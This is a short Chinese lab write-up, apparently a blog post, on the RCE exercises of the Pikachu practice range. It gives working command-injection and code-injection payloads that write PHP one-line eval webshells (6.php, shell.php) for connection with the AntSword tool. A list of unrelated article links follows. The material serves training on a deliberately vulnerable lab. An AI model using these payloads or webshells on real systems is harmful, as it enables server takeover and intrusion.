Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
松涛和鸣几秒前
DAY55 Getting Started with ARM and IMX6ULL
linux·服务器·网络·arm开发·数据库·html
HIT_Weston12 分钟前
101、【Ubuntu】【Hugo】搭建私人博客:元信息&翻译(二)
linux·运维·ubuntu
无线图像传输研究探索16 分钟前
如何提升机器狗 “超视距” 作战能力?
服务器·网络·5g·机器人·无线图传·机器狗
座山雕~33 分钟前
docker---部署与常用命令
运维·docker·容器
成工小白43 分钟前
网络复习(1)
服务器·网络·php
凯丨1 小时前
使用 frp 实现内网穿透:让本地服务器安全暴露到公网
运维·服务器·安全
小小福仔1 小时前
Linux运维基础篇(二)之用户管理
linux·运维·服务器·增删改查
企业对冲系统官1 小时前
大宗商品风险对冲系统统计分析功能的技术实现
运维·python·算法·区块链·github·pygame
下海fallsea1 小时前
德邦跟了京东,极兔搂住顺丰
网络·人工智能·安全
Web极客码1 小时前
如何在WordPress登录页面添加隐藏或显示密码按钮
运维·服务器